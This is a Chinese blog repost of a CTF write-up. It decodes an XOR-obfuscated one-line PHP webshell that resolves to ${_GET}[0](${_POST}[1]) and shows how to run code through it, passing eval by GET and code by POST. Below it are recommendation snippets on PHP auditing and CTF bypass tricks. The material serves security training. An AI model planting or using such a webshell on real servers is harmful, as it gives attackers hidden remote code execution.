PHP代码分析 CTF

最新推荐文章于 2024-05-03 21:20:08 发布
最新推荐文章于 2024-05-03 21:20:08 发布
阅读量372 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/pangya/p/10709661.html
版权

1.练练墨者学院的靶机。关于php

打开如下图。

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

2.先执行一下。

前三行为传参数。
$_   =  1
$__  = _GET
$___ = _POST
${$__}[!$_](${$___}[$_]) = ${_GET}[!1](${_POST}[1]); = ${_GET}[0](${_POST}[1]);

3.正常的一句话

eval($_POST[1])   

这里是  ${_GET}[0](${_POST}[1])

所有 eval 也就是执行函数要使用get方式去传进去,然后post方式去条用可执行代码。

http://127.0.0.1/1.php?0=eval

1=phpinfo()

这样方式。

 

转载于:https://www.cnblogs.com/pangya/p/10709661.html

weixin_30333885
关注
ctf php代码审计 绕过,Bugku CTF代码审计解题记录
weixin_35870524的博客
04-11 820
前言此笔记为在Bugku CTF平台上做代码审计题目的过程,也算是一篇wp吧extract变量覆盖extract($_GET):$_GET:表示在传递参数时,URL通过get的方式传参,传输的数据以数组的形式封装在$_GET中extract():从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量file_ge...
ctfphp语言
m0_71288644的博客
01-01 130
一.php函数 注:If、switch等条件判断语句只能判断变量有没有值 不能判断变量存不存在 <? if($miejue){ echo'灭绝师太'; } ?> 则会报错 but在isset()和empty()函数下会直接显示没有 <? it(isset($miejue)){ echo
php源码 研究,php源码分析
weixin_42151036的博客
03-10 246
wget http://pecl.php.net/get/vld-0.11.2.tgztar zxf vld-0.11.2.tgzcd vld-0.11.2which phpize/usr/bin/phpizefind / -name 'php-config'/usr/bin/php-config./configure --with-php-config=/usr/bin/php-config -...
php代码分析工具,PHP代码静态分析工具PHPStan
weixin_35340730的博客
03-09 393
最近发现自己写的PHP代码运行结果总跟自己预想的不一样,排查时发现大多是语法错误,在运行之前错误已经种下。可能是自己粗心大意,或者说php -l检测太简单,不过的确是有一些语法错误埋藏得太深(毕竟PHP是动态语言),那么有没有办法,在代码代码正式运行之前,把语法错误全找出来呢?这里介绍一款PHP代码静态分析工具:PHPStan,不需要运行代码,也可以对代码进行严格的语法检测,尽量将代码运行错误率降...
php 代码分析软件,分析和解析PHP代码的7大工具
weixin_33632843的博客
03-24 553
PHP-Parser是一个用PHP编写的PHP解析器(支持PHP 5.4以及更早的版本),这种特殊的解析器非常适合静态代码分析。该工具的目的就是简化静态代码分析和操作,它使程序员能够以编程的方式来处理任何应用程序的代码PHPSandbox将运行PHP作为独立进程的一种方式。 它为程序员提供一种外围脚本的保护,比如错误、崩溃、运行慢的脚本,或者不适合在代码中运行的脚本,都可作为独立进程来运行。PH...
php版本代码分析,分析和解析PHP代码的7大工具
weixin_34812649的博客
03-25 207
PHP已成为时下最热门的编程语言之一,然而却有许多PHP程序员苦恼找不到合适的工具来帮助自己分析和解析PHP代码。今天小编就为大家介绍几个非常不错的工具,来帮助程序员们提高自己的工作效率,一起来看看吧!PHP ParserPHP-Parser是一个用PHP编写的PHP解析器(支持PHP 5.4以及更早的版本),这种特殊的解析器非常适合静态代码分析。该工具的目的就是简化静态代码分析和操作,它使程序员...
ctf 图片 php_PHP代码审计之CTF系列(1)
weixin_33450988的博客
03-09 1007
PHP代码审计之CTF系列(1)采用github yaofeifly师傅的PHP练习。每个内容均采用docker。部署过程:进入对应的docker_env,使用docker-compose builddocker-compose up -d进入对应docker进程,查看地址访问即可。challenge 1访问地址,发现源码1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZg...
ctf中怎样获取php文件源码,CTF-Web14(涉及PHP代码审计——不走寻常路的绕过)
weixin_30539317的博客
03-09 1619
CTF-Web14(涉及PHP代码审计——不走寻常路的绕过)CTF-Web14(涉及PHP代码审计——不走寻常路的绕过)14.程序逻辑问题分析:查看源代码:初了解(可略):1.mysql_fetch_array() 中可选的第二个参数 result_type 是一个常量,可以接受以下值:MYSQL_ASSOC,MYSQL_NUM 和 MYSQL_BOTH。本特性是 PHP 3.0.7 起新加的。2...
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
汇编函数查询手册能指导你理解和解析二进制代码分析其运行逻辑,这对于破解加密算法、修复漏洞等挑战至关重要。 6. **CHM电子书的优势**: CHM格式的书籍具有小巧、集成的特点,可以快速检索内容,非常适合离线...
php代码-ctf payload 第九题 反序列化 do you know robot
07-16
本题"php代码-ctf payload 第九题 反序列化 do you know robot"显然是一个关于PHP反序列化漏洞利用的实战题目。下面将详细解释相关知识点,并结合可能的`main.php`和`README.txt`文件内容进行分析。 **反序列化** ...
针对ctf线下赛流量抓取(php)+真实环境流量抓取分析的工具源码+项目说明.zip
01-30
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和...针对ctf线下赛流量抓取(php)+真实环境流量抓取分析的工具源码+项目说明.zip
2024年网络安全最新ctf中常见php特性_php特性 ctf
最新发布
m0_54903333的博客
05-03 897
在这个例子中,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
代码审计 PHP代码理解.
网络安全领域___专研者.
03-21 4443
PHP语言的 概括: (1)PHP 是可以创建动态交互性站点的强有力的服务器端的脚本语言。 (2)PHP可以做很多东西,特别是web网站开发,也可以使用的非常广泛。能够快速,灵活,实用使得PHP语言可以更好的开发任何网站。 (3)PHP 是一种 HTML 嵌入式的脚本语言。php文件以.php结尾。PHP语言的很多语法来自 C,Java 和 Perl,并具有几个 PHP 独有的特点。PHP语言的主要目标是让 Web 开发程序员可以快速的书写动态生成的网页。
php项目源码分析,如何分析学习 PHP 开源项目
weixin_34702885的博客
04-01 760
在我们开发项目的过程中,不可避免的会使用一些开软程序,因为使用开源程序可以缩短我们的开发周期,降低研发成本。但是在使用过程中,难免会碰到各种坑,这个时候,就要求程序员拥有分析开源项目的能力,因为并非是所有开源项目都会拥有一个稳定的维护团队和健全的文档(毕竟开源项目很少有盈利的)。在进行 PHP 研发过程中,我们可以使用以下5中方式来进行代码分析:看文档Xdebug做调试自带函数(debug_bac...
PHP代码漏洞分析
fencecat的博客
12-31 2299
实验项目 PHP代码漏洞分析实验 综合性实验 2020年10月31日 一、实验综述 1.实验目的及要求 (1)掌握源代码分析的基本原理 (2)掌握RIPS源代码分析工具的使用 (3)结合源代码分析原理对DVWA平台的代码进行分析 2.实验仪器、设备或软件 Vmware station PHPstudy DVWA Windows7操作系统 3.实验原理 (1)软件漏洞: 软件漏洞分析技术主要分为:软件架构安全分析技术、源代码漏洞分析技术、二进制漏洞分析技术和运行系统漏洞分析技术四大类。...
ctfphp语言1
2201_76123071的博客
12-30 127
php语言
php 字母数字下划线,CTF踩坑PHP编写一个不包含数字字母和下划线的后门
weixin_30282917的博客
03-11 810
首先要了解一下php中异或的用法先看以下代码echo "A"^"?";?>运行结果图片.png我们可以看到,输出的结果是字符"~"。之所以会得到这样的结果,是因为代码中对字符"A"和字符"?"进行了异或操作。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。异或操...
CTF PHP代码注入
07-15
CTF(Capture The Flag)竞赛中,常见的一个攻击技术是PHP代码注入(PHP Code Injection)。这种攻击利用了应用程序对用户输入的不充分验证和过滤,使得攻击者能够将恶意的PHP代码注入到应用程序中,从而执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值